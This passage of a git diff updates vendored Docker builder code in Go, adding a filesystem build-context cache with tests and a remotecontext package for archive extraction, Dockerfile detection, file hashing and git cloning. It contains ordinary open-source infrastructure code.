len(src.refs) > 0 { + return errors.Errorf("can't delete %s because it has active references", id) + } + delete(s.sources, id) + if err := s.db.Update(func(tx *bolt.Tx) error { + return 
tx.DeleteBucket([]byte(id)) + }); err != nil { + return err + } + return s.fs.Remove(src.BackendID) +} + +type sourceMeta struct { + SharedKey string + BackendID string + CachePolicy CachePolicy + Size int64 +} + +type cachedSource struct { + sourceMeta + refs map[*cachedSourceRef]struct{} + id string + dir string + src *remotecontext.CachableSource + storage *fsCacheStore + cached bool // keep track if cache is up to date +} + +type cachedSourceRef struct { + *cachedSource +} + +func (cs *cachedSource) Dir() string { + return cs.dir +} + +// hold storage lock before calling +func (cs *cachedSource) getRef() *cachedSourceRef { + ref := &cachedSourceRef{cachedSource: cs} + cs.refs[ref] = struct{}{} + return ref +} + +// hold storage lock before calling +func (cs *cachedSource) getSize(ctx context.Context) (int64, error) { + if cs.sourceMeta.Size < 0 { + ss, err := directory.Size(ctx, cs.dir) + if err != nil { + return 0, err + } + if err := cs.resetSize(ss); err != nil { + return 0, err + } + return ss, nil + } + return cs.sourceMeta.Size, nil +} + +func (cs *cachedSource) resetSize(val int64) error { + cs.sourceMeta.Size = val + return cs.saveMeta() +} +func (cs *cachedSource) saveMeta() error { + return cs.storage.db.Update(func(tx *bolt.Tx) error { + b := tx.Bucket([]byte(cs.id)) + dt, err := json.Marshal(cs.sourceMeta) + if err != nil { + return err + } + return b.Put([]byte(metaKey), dt) + }) +} + +func (csr *cachedSourceRef) Release() error { + csr.cachedSource.storage.mu.Lock() + defer csr.cachedSource.storage.mu.Unlock() + delete(csr.cachedSource.refs, csr) + if len(csr.cachedSource.refs) == 0 { + go csr.cachedSource.storage.GC() + } + return nil +} + +type detectChanges struct { + f fsutil.ChangeFunc + supported bool +} + +func (dc *detectChanges) HandleChange(kind fsutil.ChangeKind, path string, fi os.FileInfo, err error) error { + if dc == nil { + return nil + } + return dc.f(kind, path, fi, err) +} + +func (dc *detectChanges) MarkSupported(v bool) { + if 
dc == nil { + return + } + dc.supported = v +} + +func (dc *detectChanges) ContentHasher() fsutil.ContentHasher { + return newTarsumHash +} + +type wrappedContext struct { + builder.Source + closer func() error +} + +func (wc *wrappedContext) Close() error { + if err := wc.Source.Close(); err != nil { + return err + } + return wc.closer() +} + +type sortableCacheSources []*cachedSource + +// Len is the number of elements in the collection. +func (s sortableCacheSources) Len() int { + return len(s) +} + +// Less reports whether the element with +// index i should sort before the element with index j. +func (s sortableCacheSources) Less(i, j int) bool { + return s[i].CachePolicy.LastUsed.Before(s[j].CachePolicy.LastUsed) +} + +// Swap swaps the elements with indexes i and j. +func (s sortableCacheSources) Swap(i, j int) { + s[i], s[j] = s[j], s[i] +} + +func newTarsumHash(stat *fsutil.Stat) (hash.Hash, error) { + fi := &fsutil.StatInfo{Stat: stat} + p := stat.Path + if fi.IsDir() { + p += string(os.PathSeparator) + } + h, err := archive.FileInfoHeader(p, fi, stat.Linkname) + if err != nil { + return nil, err + } + h.Name = p + h.Uid = int(stat.Uid) + h.Gid = int(stat.Gid) + h.Linkname = stat.Linkname + if stat.Xattrs != nil { + h.Xattrs = make(map[string]string) + for k, v := range stat.Xattrs { + h.Xattrs[k] = string(v) + } + } + + tsh := &tarsumHash{h: h, Hash: sha256.New()} + tsh.Reset() + return tsh, nil +} + +// Reset resets the Hash to its initial state. 
+func (tsh *tarsumHash) Reset() { + tsh.Hash.Reset() + tarsum.WriteV1Header(tsh.h, tsh.Hash) +} + +type tarsumHash struct { + hash.Hash + h *tar.Header +} diff --git a/vendor/github.com/docker/docker/builder/fscache/fscache_test.go b/vendor/github.com/docker/docker/builder/fscache/fscache_test.go new file mode 100644 index 0000000000..5108d65df1 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/fscache/fscache_test.go @@ -0,0 +1,132 @@ +package fscache // import "github.com/docker/docker/builder/fscache" + +import ( + "context" + "io/ioutil" + "os" + "path/filepath" + "testing" + "time" + + "github.com/moby/buildkit/session/filesync" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" +) + +func TestFSCache(t *testing.T) { + tmpDir, err := ioutil.TempDir("", "fscache") + assert.Check(t, err) + defer os.RemoveAll(tmpDir) + + backend := NewNaiveCacheBackend(filepath.Join(tmpDir, "backend")) + + opt := Opt{ + Root: tmpDir, + Backend: backend, + GCPolicy: GCPolicy{MaxSize: 15, MaxKeepDuration: time.Hour}, + } + + fscache, err := NewFSCache(opt) + assert.Check(t, err) + + defer fscache.Close() + + err = fscache.RegisterTransport("test", &testTransport{}) + assert.Check(t, err) + + src1, err := fscache.SyncFrom(context.TODO(), &testIdentifier{"foo", "data", "bar"}) + assert.Check(t, err) + + dt, err := ioutil.ReadFile(filepath.Join(src1.Root().Path(), "foo")) + assert.Check(t, err) + assert.Check(t, is.Equal(string(dt), "data")) + + // same id doesn't recalculate anything + src2, err := fscache.SyncFrom(context.TODO(), &testIdentifier{"foo", "data2", "bar"}) + assert.Check(t, err) + assert.Check(t, is.Equal(src1.Root().Path(), src2.Root().Path())) + + dt, err = ioutil.ReadFile(filepath.Join(src1.Root().Path(), "foo")) + assert.Check(t, err) + assert.Check(t, is.Equal(string(dt), "data")) + assert.Check(t, src2.Close()) + + src3, err := fscache.SyncFrom(context.TODO(), &testIdentifier{"foo2", "data2", "bar"}) + assert.Check(t, err) + assert.Check(t, 
src1.Root().Path() != src3.Root().Path()) + + dt, err = ioutil.ReadFile(filepath.Join(src3.Root().Path(), "foo2")) + assert.Check(t, err) + assert.Check(t, is.Equal(string(dt), "data2")) + + s, err := fscache.DiskUsage(context.TODO()) + assert.Check(t, err) + assert.Check(t, is.Equal(s, int64(0))) + + assert.Check(t, src3.Close()) + + s, err = fscache.DiskUsage(context.TODO()) + assert.Check(t, err) + assert.Check(t, is.Equal(s, int64(5))) + + // new upload with the same shared key shoutl overwrite + src4, err := fscache.SyncFrom(context.TODO(), &testIdentifier{"foo3", "data3", "bar"}) + assert.Check(t, err) + assert.Check(t, src1.Root().Path() != src3.Root().Path()) + + dt, err = ioutil.ReadFile(filepath.Join(src3.Root().Path(), "foo3")) + assert.Check(t, err) + assert.Check(t, is.Equal(string(dt), "data3")) + assert.Check(t, is.Equal(src4.Root().Path(), src3.Root().Path())) + assert.Check(t, src4.Close()) + + s, err = fscache.DiskUsage(context.TODO()) + assert.Check(t, err) + assert.Check(t, is.Equal(s, int64(10))) + + // this one goes over the GC limit + src5, err := fscache.SyncFrom(context.TODO(), &testIdentifier{"foo4", "datadata", "baz"}) + assert.Check(t, err) + assert.Check(t, src5.Close()) + + // GC happens async + time.Sleep(100 * time.Millisecond) + + // only last insertion after GC + s, err = fscache.DiskUsage(context.TODO()) + assert.Check(t, err) + assert.Check(t, is.Equal(s, int64(8))) + + // prune deletes everything + released, err := fscache.Prune(context.TODO()) + assert.Check(t, err) + assert.Check(t, is.Equal(released, uint64(8))) + + s, err = fscache.DiskUsage(context.TODO()) + assert.Check(t, err) + assert.Check(t, is.Equal(s, int64(0))) +} + +type testTransport struct { +} + +func (t *testTransport) Copy(ctx context.Context, id RemoteIdentifier, dest string, cs filesync.CacheUpdater) error { + testid := id.(*testIdentifier) + return ioutil.WriteFile(filepath.Join(dest, testid.filename), []byte(testid.data), 0600) +} + +type testIdentifier 
struct { + filename string + data string + sharedKey string +} + +func (t *testIdentifier) Key() string { + return t.filename +} +func (t *testIdentifier) SharedKey() string { + return t.sharedKey +} +func (t *testIdentifier) Transport() string { + return "test" +} diff --git a/vendor/github.com/docker/docker/builder/fscache/naivedriver.go b/vendor/github.com/docker/docker/builder/fscache/naivedriver.go new file mode 100644 index 0000000000..053509aecf --- /dev/null +++ b/vendor/github.com/docker/docker/builder/fscache/naivedriver.go @@ -0,0 +1,28 @@ +package fscache // import "github.com/docker/docker/builder/fscache" + +import ( + "os" + "path/filepath" + + "github.com/pkg/errors" +) + +// NewNaiveCacheBackend is a basic backend implementation for fscache +func NewNaiveCacheBackend(root string) Backend { + return &naiveCacheBackend{root: root} +} + +type naiveCacheBackend struct { + root string +} + +func (tcb *naiveCacheBackend) Get(id string) (string, error) { + d := filepath.Join(tcb.root, id) + if err := os.MkdirAll(d, 0700); err != nil { + return "", errors.Wrapf(err, "failed to create tmp dir for %s", d) + } + return d, nil +} +func (tcb *naiveCacheBackend) Remove(id string) error { + return errors.WithStack(os.RemoveAll(filepath.Join(tcb.root, id))) +} diff --git a/vendor/github.com/docker/docker/builder/git.go b/vendor/github.com/docker/docker/builder/git.go deleted file mode 100644 index 74df244611..0000000000 --- a/vendor/github.com/docker/docker/builder/git.go +++ /dev/null @@ -1,28 +0,0 @@ -package builder - -import ( - "os" - - "github.com/docker/docker/pkg/archive" - "github.com/docker/docker/pkg/gitutils" -) - -// MakeGitContext returns a Context from gitURL that is cloned in a temporary directory. 
-func MakeGitContext(gitURL string) (ModifiableContext, error) { - root, err := gitutils.Clone(gitURL) - if err != nil { - return nil, err - } - - c, err := archive.Tar(root, archive.Uncompressed) - if err != nil { - return nil, err - } - - defer func() { - // TODO: print errors? - c.Close() - os.RemoveAll(root) - }() - return MakeTarSumContext(c) -} diff --git a/vendor/github.com/docker/docker/builder/remote.go b/vendor/github.com/docker/docker/builder/remote.go deleted file mode 100644 index f3a4329d16..0000000000 --- a/vendor/github.com/docker/docker/builder/remote.go +++ /dev/null @@ -1,157 +0,0 @@ -package builder - -import ( - "bytes" - "errors" - "fmt" - "io" - "io/ioutil" - "regexp" - - "github.com/docker/docker/pkg/archive" - "github.com/docker/docker/pkg/httputils" - "github.com/docker/docker/pkg/urlutil" -) - -// When downloading remote contexts, limit the amount (in bytes) -// to be read from the response body in order to detect its Content-Type -const maxPreambleLength = 100 - -const acceptableRemoteMIME = `(?:application/(?:(?:x\-)?tar|octet\-stream|((?:x\-)?(?:gzip|bzip2?|xz)))|(?:text/plain))` - -var mimeRe = regexp.MustCompile(acceptableRemoteMIME) - -// MakeRemoteContext downloads a context from remoteURL and returns it. -// -// If contentTypeHandlers is non-nil, then the Content-Type header is read along with a maximum of -// maxPreambleLength bytes from the body to help detecting the MIME type. -// Look at acceptableRemoteMIME for more details. -// -// If a match is found, then the body is sent to the contentType handler and a (potentially compressed) tar stream is expected -// to be returned. If no match is found, it is assumed the body is a tar stream (compressed or not). -// In either case, an (assumed) tar stream is passed to MakeTarSumContext whose result is returned. 
-func MakeRemoteContext(remoteURL string, contentTypeHandlers map[string]func(io.ReadCloser) (io.ReadCloser, error)) (ModifiableContext, error) { - f, err := httputils.Download(remoteURL) - if err != nil { - return nil, fmt.Errorf("error downloading remote context %s: %v", remoteURL, err) - } - defer f.Body.Close() - - var contextReader io.ReadCloser - if contentTypeHandlers != nil { - contentType := f.Header.Get("Content-Type") - clen := f.ContentLength - - contentType, contextReader, err = inspectResponse(contentType, f.Body, clen) - if err != nil { - return nil, fmt.Errorf("error detecting content type for remote %s: %v", remoteURL, err) - } - defer contextReader.Close() - - // This loop tries to find a content-type handler for the detected content-type. - // If it could not find one from the caller-supplied map, it tries the empty content-type `""` - // which is interpreted as a fallback handler (usually used for raw tar contexts). - for _, ct := range []string{contentType, ""} { - if fn, ok := contentTypeHandlers[ct]; ok { - defer contextReader.Close() - if contextReader, err = fn(contextReader); err != nil { - return nil, err - } - break - } - } - } - - // Pass through - this is a pre-packaged context, presumably - // with a Dockerfile with the right name inside it. - return MakeTarSumContext(contextReader) -} - -// DetectContextFromRemoteURL returns a context and in certain cases the name of the dockerfile to be used -// irrespective of user input. -// progressReader is only used if remoteURL is actually a URL (not empty, and not a Git endpoint). 
-func DetectContextFromRemoteURL(r io.ReadCloser, remoteURL string, createProgressReader func(in io.ReadCloser) io.ReadCloser) (context ModifiableContext, dockerfileName string, err error) { - switch { - case remoteURL == "": - context, err = MakeTarSumContext(r) - case urlutil.IsGitURL(remoteURL): - context, err = MakeGitContext(remoteURL) - case urlutil.IsURL(remoteURL): - context, err = MakeRemoteContext(remoteURL, map[string]func(io.ReadCloser) (io.ReadCloser, error){ - httputils.MimeTypes.TextPlain: func(rc io.ReadCloser) (io.ReadCloser, error) { - dockerfile, err := ioutil.ReadAll(rc) - if err != nil { - return nil, err - } - - // dockerfileName is set to signal that the remote was interpreted as a single Dockerfile, in which case the caller - // should use dockerfileName as the new name for the Dockerfile, irrespective of any other user input. - dockerfileName = DefaultDockerfileName - - // TODO: return a context without tarsum - r, err := archive.Generate(dockerfileName, string(dockerfile)) - if err != nil { - return nil, err - } - - return ioutil.NopCloser(r), nil - }, - // fallback handler (tar context) - "": func(rc io.ReadCloser) (io.ReadCloser, error) { - return createProgressReader(rc), nil - }, - }) - default: - err = fmt.Errorf("remoteURL (%s) could not be recognized as URL", remoteURL) - } - return -} - -// inspectResponse looks into the http response data at r to determine whether its -// content-type is on the list of acceptable content types for remote build contexts. -// This function returns: -// - a string representation of the detected content-type -// - an io.Reader for the response body -// - an error value which will be non-nil either when something goes wrong while -// reading bytes from r or when the detected content-type is not acceptable. 
-func inspectResponse(ct string, r io.ReadCloser, clen int64) (string, io.ReadCloser, error) { - plen := clen - if plen <= 0 || plen > maxPreambleLength { - plen = maxPreambleLength - } - - preamble := make([]byte, plen, plen) - rlen, err := r.Read(preamble) - if rlen == 0 { - return ct, r, errors.New("empty response") - } - if err != nil && err != io.EOF { - return ct, r, err - } - - preambleR := bytes.NewReader(preamble) - bodyReader := ioutil.NopCloser(io.MultiReader(preambleR, r)) - // Some web servers will use application/octet-stream as the default - // content type for files without an extension (e.g. 'Dockerfile') - // so if we receive this value we better check for text content - contentType := ct - if len(ct) == 0 || ct == httputils.MimeTypes.OctetStream { - contentType, _, err = httputils.DetectContentType(preamble) - if err != nil { - return contentType, bodyReader, err - } - } - - contentType = selectAcceptableMIME(contentType) - var cterr error - if len(contentType) == 0 { - cterr = fmt.Errorf("unsupported Content-Type %q", ct) - contentType = ct - } - - return contentType, bodyReader, cterr -} - -func selectAcceptableMIME(ct string) string { - return mimeRe.FindString(ct) -} diff --git a/vendor/github.com/docker/docker/builder/remotecontext/archive.go b/vendor/github.com/docker/docker/builder/remotecontext/archive.go new file mode 100644 index 0000000000..6d247f945d --- /dev/null +++ b/vendor/github.com/docker/docker/builder/remotecontext/archive.go @@ -0,0 +1,125 @@ +package remotecontext // import "github.com/docker/docker/builder/remotecontext" + +import ( + "io" + "os" + "path/filepath" + + "github.com/docker/docker/builder" + "github.com/docker/docker/pkg/archive" + "github.com/docker/docker/pkg/chrootarchive" + "github.com/docker/docker/pkg/containerfs" + "github.com/docker/docker/pkg/ioutils" + "github.com/docker/docker/pkg/tarsum" + "github.com/pkg/errors" +) + +type archiveContext struct { + root containerfs.ContainerFS + sums 
tarsum.FileInfoSums +} + +func (c *archiveContext) Close() error { + return c.root.RemoveAll(c.root.Path()) +} + +func convertPathError(err error, cleanpath string) error { + if err, ok := err.(*os.PathError); ok { + err.Path = cleanpath + return err + } + return err +} + +type modifiableContext interface { + builder.Source + // Remove deletes the entry specified by `path`. + // It is usual for directory entries to delete all its subentries. + Remove(path string) error +} + +// FromArchive returns a build source from a tar stream. +// +// It extracts the tar stream to a temporary folder that is deleted as soon as +// the Context is closed. +// As the extraction happens, a tarsum is calculated for every file, and the set of +// all those sums then becomes the source of truth for all operations on this Context. +// +// Closing tarStream has to be done by the caller. +func FromArchive(tarStream io.Reader) (builder.Source, error) { + root, err := ioutils.TempDir("", "docker-builder") + if err != nil { + return nil, err + } + + // Assume local file system. Since it's coming from a tar file. + tsc := &archiveContext{root: containerfs.NewLocalContainerFS(root)} + + // Make sure we clean-up upon error. 
In the happy case the caller + // is expected to manage the clean-up + defer func() { + if err != nil { + tsc.Close() + } + }() + + decompressedStream, err := archive.DecompressStream(tarStream) + if err != nil { + return nil, err + } + + sum, err := tarsum.NewTarSum(decompressedStream, true, tarsum.Version1) + if err != nil { + return nil, err + } + + err = chrootarchive.Untar(sum, root, nil) + if err != nil { + return nil, err + } + + tsc.sums = sum.GetSums() + return tsc, nil +} + +func (c *archiveContext) Root() containerfs.ContainerFS { + return c.root +} + +func (c *archiveContext) Remove(path string) error { + _, fullpath, err := normalize(path, c.root) + if err != nil { + return err + } + return c.root.RemoveAll(fullpath) +} + +func (c *archiveContext) Hash(path string) (string, error) { + cleanpath, fullpath, err := normalize(path, c.root) + if err != nil { + return "", err + } + + rel, err := c.root.Rel(c.root.Path(), fullpath) + if err != nil { + return "", convertPathError(err, cleanpath) + } + + // Use the checksum of the followed path(not the possible symlink) because + // this is the file that is actually copied. + if tsInfo := c.sums.GetFile(filepath.ToSlash(rel)); tsInfo != nil { + return tsInfo.Sum(), nil + } + // We set sum to path by default for the case where GetFile returns nil. + // The usual case is if relative path is empty. 
+ return path, nil // backwards compat TODO: see if really needed +} + +func normalize(path string, root containerfs.ContainerFS) (cleanPath, fullPath string, err error) { + cleanPath = root.Clean(string(root.Separator()) + path)[1:] + fullPath, err = root.ResolveScopedPath(path, true) + if err != nil { + return "", "", errors.Wrapf(err, "forbidden path outside the build context: %s (%s)", path, cleanPath) + } + return +} diff --git a/vendor/github.com/docker/docker/builder/remotecontext/detect.go b/vendor/github.com/docker/docker/builder/remotecontext/detect.go new file mode 100644 index 0000000000..aaace269e9 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/remotecontext/detect.go @@ -0,0 +1,180 @@ +package remotecontext // import "github.com/docker/docker/builder/remotecontext" + +import ( + "bufio" + "fmt" + "io" + "os" + "strings" + + "github.com/containerd/continuity/driver" + "github.com/docker/docker/api/types/backend" + "github.com/docker/docker/builder" + "github.com/docker/docker/builder/dockerignore" + "github.com/docker/docker/pkg/fileutils" + "github.com/docker/docker/pkg/urlutil" + "github.com/moby/buildkit/frontend/dockerfile/parser" + "github.com/pkg/errors" + "github.com/sirupsen/logrus" +) + +// ClientSessionRemote is identifier for client-session context transport +const ClientSessionRemote = "client-session" + +// Detect returns a context and dockerfile from remote location or local +// archive. progressReader is only used if remoteURL is actually a URL +// (not empty, and not a Git endpoint). 
+func Detect(config backend.BuildConfig) (remote builder.Source, dockerfile *parser.Result, err error) { + remoteURL := config.Options.RemoteContext + dockerfilePath := config.Options.Dockerfile + + switch { + case remoteURL == "": + remote, dockerfile, err = newArchiveRemote(config.Source, dockerfilePath) + case remoteURL == ClientSessionRemote: + res, err := parser.Parse(config.Source) + if err != nil { + return nil, nil, err + } + return nil, res, nil + case urlutil.IsGitURL(remoteURL): + remote, dockerfile, err = newGitRemote(remoteURL, dockerfilePath) + case urlutil.IsURL(remoteURL): + remote, dockerfile, err = newURLRemote(remoteURL, dockerfilePath, config.ProgressWriter.ProgressReaderFunc) + default: + err = fmt.Errorf("remoteURL (%s) could not be recognized as URL", remoteURL) + } + return +} + +func newArchiveRemote(rc io.ReadCloser, dockerfilePath string) (builder.Source, *parser.Result, error) { + defer rc.Close() + c, err := FromArchive(rc) + if err != nil { + return nil, nil, err + } + + return withDockerfileFromContext(c.(modifiableContext), dockerfilePath) +} + +func withDockerfileFromContext(c modifiableContext, dockerfilePath string) (builder.Source, *parser.Result, error) { + df, err := openAt(c, dockerfilePath) + if err != nil { + if os.IsNotExist(err) { + if dockerfilePath == builder.DefaultDockerfileName { + lowercase := strings.ToLower(dockerfilePath) + if _, err := StatAt(c, lowercase); err == nil { + return withDockerfileFromContext(c, lowercase) + } + } + return nil, nil, errors.Errorf("Cannot locate specified Dockerfile: %s", dockerfilePath) // backwards compatible error + } + c.Close() + return nil, nil, err + } + + res, err := readAndParseDockerfile(dockerfilePath, df) + if err != nil { + return nil, nil, err + } + + df.Close() + + if err := removeDockerfile(c, dockerfilePath); err != nil { + c.Close() + return nil, nil, err + } + + return c, res, nil +} + +func newGitRemote(gitURL string, dockerfilePath string) (builder.Source, 
*parser.Result, error) { + c, err := MakeGitContext(gitURL) // TODO: change this to NewLazySource + if err != nil { + return nil, nil, err + } + return withDockerfileFromContext(c.(modifiableContext), dockerfilePath) +} + +func newURLRemote(url string, dockerfilePath string, progressReader func(in io.ReadCloser) io.ReadCloser) (builder.Source, *parser.Result, error) { + contentType, content, err := downloadRemote(url) + if err != nil { + return nil, nil, err + } + defer content.Close() + + switch contentType { + case mimeTypes.TextPlain: + res, err := parser.Parse(progressReader(content)) + return nil, res, err + default: + source, err := FromArchive(progressReader(content)) + if err != nil { + return nil, nil, err + } + return withDockerfileFromContext(source.(modifiableContext), dockerfilePath) + } +} + +func removeDockerfile(c modifiableContext, filesToRemove ...string) error { + f, err := openAt(c, ".dockerignore") + // Note that a missing .dockerignore file isn't treated as an error + switch { + case os.IsNotExist(err): + return nil + case err != nil: + return err + } + excludes, err := dockerignore.ReadAll(f) + if err != nil { + f.Close() + return err + } + f.Close() + filesToRemove = append([]string{".dockerignore"}, filesToRemove...) 
+ for _, fileToRemove := range filesToRemove { + if rm, _ := fileutils.Matches(fileToRemove, excludes); rm { + if err := c.Remove(fileToRemove); err != nil { + logrus.Errorf("failed to remove %s: %v", fileToRemove, err) + } + } + } + return nil +} + +func readAndParseDockerfile(name string, rc io.Reader) (*parser.Result, error) { + br := bufio.NewReader(rc) + if _, err := br.Peek(1); err != nil { + if err == io.EOF { + return nil, errors.Errorf("the Dockerfile (%s) cannot be empty", name) + } + return nil, errors.Wrap(err, "unexpected error reading Dockerfile") + } + return parser.Parse(br) +} + +func openAt(remote builder.Source, path string) (driver.File, error) { + fullPath, err := FullPath(remote, path) + if err != nil { + return nil, err + } + return remote.Root().Open(fullPath) +} + +// StatAt is a helper for calling Stat on a path from a source +func StatAt(remote builder.Source, path string) (os.FileInfo, error) { + fullPath, err := FullPath(remote, path) + if err != nil { + return nil, err + } + return remote.Root().Stat(fullPath) +} + +// FullPath is a helper for getting a full path for a path from a source +func FullPath(remote builder.Source, path string) (string, error) { + fullPath, err := remote.Root().ResolveScopedPath(path, true) + if err != nil { + return "", fmt.Errorf("Forbidden path outside the build context: %s (%s)", path, fullPath) // backwards compat with old error + } + return fullPath, nil +} diff --git a/vendor/github.com/docker/docker/builder/dockerignore_test.go b/vendor/github.com/docker/docker/builder/remotecontext/detect_test.go similarity index 58% rename from vendor/github.com/docker/docker/builder/dockerignore_test.go rename to vendor/github.com/docker/docker/builder/remotecontext/detect_test.go index 3c0ceda4cf..04b7686c7a 100644 --- a/vendor/github.com/docker/docker/builder/dockerignore_test.go +++ b/vendor/github.com/docker/docker/builder/remotecontext/detect_test.go @@ -1,17 +1,27 @@ -package builder +package remotecontext // 
import "github.com/docker/docker/builder/remotecontext" import ( + "errors" "io/ioutil" "log" "os" "sort" "testing" + + "github.com/docker/docker/builder" + "github.com/docker/docker/pkg/containerfs" +) + +const ( + dockerfileContents = "FROM busybox" + dockerignoreFilename = ".dockerignore" + testfileContents = "test" ) const shouldStayFilename = "should_stay" func extractFilenames(files []os.FileInfo) []string { - filenames := make([]string, len(files), len(files)) + filenames := make([]string, len(files)) for i, file := range files { filenames[i] = file.Name() @@ -43,10 +53,9 @@ func checkDirectory(t *testing.T, dir string, expectedFiles []string) { } func executeProcess(t *testing.T, contextDir string) { - modifiableCtx := &tarSumContext{root: contextDir} - ctx := DockerIgnoreContext{ModifiableContext: modifiableCtx} + modifiableCtx := &stubRemote{root: containerfs.NewLocalContainerFS(contextDir)} - err := ctx.Process([]string{DefaultDockerfileName}) + err := removeDockerfile(modifiableCtx, builder.DefaultDockerfileName) if err != nil { t.Fatalf("Error when executing Process: %s", err) @@ -59,7 +68,7 @@ func TestProcessShouldRemoveDockerfileDockerignore(t *testing.T) { createTestTempFile(t, contextDir, shouldStayFilename, testfileContents, 0777) createTestTempFile(t, contextDir, dockerignoreFilename, "Dockerfile\n.dockerignore", 0777) - createTestTempFile(t, contextDir, DefaultDockerfileName, dockerfileContents, 0777) + createTestTempFile(t, contextDir, builder.DefaultDockerfileName, dockerfileContents, 0777) executeProcess(t, contextDir) @@ -72,11 +81,11 @@ func TestProcessNoDockerignore(t *testing.T) { defer cleanup() createTestTempFile(t, contextDir, shouldStayFilename, testfileContents, 0777) - createTestTempFile(t, contextDir, DefaultDockerfileName, dockerfileContents, 0777) + createTestTempFile(t, contextDir, builder.DefaultDockerfileName, dockerfileContents, 0777) executeProcess(t, contextDir) - checkDirectory(t, contextDir, []string{shouldStayFilename, 
DefaultDockerfileName}) + checkDirectory(t, contextDir, []string{shouldStayFilename, builder.DefaultDockerfileName}) } @@ -85,11 +94,30 @@ func TestProcessShouldLeaveAllFiles(t *testing.T) { defer cleanup() createTestTempFile(t, contextDir, shouldStayFilename, testfileContents, 0777) - createTestTempFile(t, contextDir, DefaultDockerfileName, dockerfileContents, 0777) + createTestTempFile(t, contextDir, builder.DefaultDockerfileName, dockerfileContents, 0777) createTestTempFile(t, contextDir, dockerignoreFilename, "input1\ninput2", 0777) executeProcess(t, contextDir) - checkDirectory(t, contextDir, []string{shouldStayFilename, DefaultDockerfileName, dockerignoreFilename}) + checkDirectory(t, contextDir, []string{shouldStayFilename, builder.DefaultDockerfileName, dockerignoreFilename}) } + +// TODO: remove after moving to a separate pkg +type stubRemote struct { + root containerfs.ContainerFS +} + +func (r *stubRemote) Hash(path string) (string, error) { + return "", errors.New("not implemented") +} + +func (r *stubRemote) Root() containerfs.ContainerFS { + return r.root +} +func (r *stubRemote) Close() error { + return errors.New("not implemented") +} +func (r *stubRemote) Remove(p string) error { + return r.root.Remove(r.root.Join(r.root.Path(), p)) +} diff --git a/vendor/github.com/docker/docker/builder/remotecontext/filehash.go b/vendor/github.com/docker/docker/builder/remotecontext/filehash.go new file mode 100644 index 0000000000..3565dd8279 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/remotecontext/filehash.go @@ -0,0 +1,45 @@ +package remotecontext // import "github.com/docker/docker/builder/remotecontext" + +import ( + "archive/tar" + "crypto/sha256" + "hash" + "os" + + "github.com/docker/docker/pkg/archive" + "github.com/docker/docker/pkg/tarsum" +) + +// NewFileHash returns new hash that is used for the builder cache keys +func NewFileHash(path, name string, fi os.FileInfo) (hash.Hash, error) { + var link string + if fi.Mode()&os.ModeSymlink 
!= 0 { + var err error + link, err = os.Readlink(path) + if err != nil { + return nil, err + } + } + hdr, err := archive.FileInfoHeader(name, fi, link) + if err != nil { + return nil, err + } + if err := archive.ReadSecurityXattrToTarHeader(path, hdr); err != nil { + return nil, err + } + tsh := &tarsumHash{hdr: hdr, Hash: sha256.New()} + tsh.Reset() // initialize header + return tsh, nil +} + +type tarsumHash struct { + hash.Hash + hdr *tar.Header +} + +// Reset resets the Hash to its initial state. +func (tsh *tarsumHash) Reset() { + // comply with hash.Hash and reset to the state hash had before any writes + tsh.Hash.Reset() + tarsum.WriteV1Header(tsh.hdr, tsh.Hash) +} diff --git a/vendor/github.com/docker/docker/builder/remotecontext/generate.go b/vendor/github.com/docker/docker/builder/remotecontext/generate.go new file mode 100644 index 0000000000..84c1b3b5ea --- /dev/null +++ b/vendor/github.com/docker/docker/builder/remotecontext/generate.go @@ -0,0 +1,3 @@ +package remotecontext // import "github.com/docker/docker/builder/remotecontext" + +//go:generate protoc --gogoslick_out=. tarsum.proto diff --git a/vendor/github.com/docker/docker/builder/remotecontext/git.go b/vendor/github.com/docker/docker/builder/remotecontext/git.go new file mode 100644 index 0000000000..1583ca28d0 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/remotecontext/git.go @@ -0,0 +1,35 @@ +package remotecontext // import "github.com/docker/docker/builder/remotecontext" + +import ( + "os" + + "github.com/docker/docker/builder" + "github.com/docker/docker/builder/remotecontext/git" + "github.com/docker/docker/pkg/archive" + "github.com/sirupsen/logrus" +) + +// MakeGitContext returns a Context from gitURL that is cloned in a temporary directory. 
+func MakeGitContext(gitURL string) (builder.Source, error) { + root, err := git.Clone(gitURL) + if err != nil { + return nil, err + } + + c, err := archive.Tar(root, archive.Uncompressed) + if err != nil { + return nil, err + } + + defer func() { + err := c.Close() + if err != nil { + logrus.WithField("action", "MakeGitContext").WithField("module", "builder").WithField("url", gitURL).WithError(err).Error("error while closing git context") + } + err = os.RemoveAll(root) + if err != nil { + logrus.WithField("action", "MakeGitContext").WithField("module", "builder").WithField("url", gitURL).WithError(err).Error("error while removing path and children of root") + } + }() + return FromArchive(c) +} diff --git a/vendor/github.com/docker/docker/builder/remotecontext/git/gitutils.go b/vendor/github.com/docker/docker/builder/remotecontext/git/gitutils.go new file mode 100644 index 0000000000..77a45beff3 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/remotecontext/git/gitutils.go @@ -0,0 +1,204 @@ +package git // import "github.com/docker/docker/builder/remotecontext/git" + +import ( + "io/ioutil" + "net/http" + "net/url" + "os" + "os/exec" + "path/filepath" + "strings" + + "github.com/docker/docker/pkg/symlink" + "github.com/docker/docker/pkg/urlutil" + "github.com/pkg/errors" +) + +type gitRepo struct { + remote string + ref string + subdir string +} + +// Clone clones a repository into a newly created directory which +// will be under "docker-build-git" +func Clone(remoteURL string) (string, error) { + repo, err := parseRemoteURL(remoteURL) + + if err != nil { + return "", err + } + + return cloneGitRepo(repo) +} + +func cloneGitRepo(repo gitRepo) (checkoutDir string, err error) { + fetch := fetchArgs(repo.remote, repo.ref) + + root, err := ioutil.TempDir("", "docker-build-git") + if err != nil { + return "", err + } + + defer func() { + if err != nil { + os.RemoveAll(root) + } + }() + + if out, err := gitWithinDir(root, "init"); err != nil { + return "", 
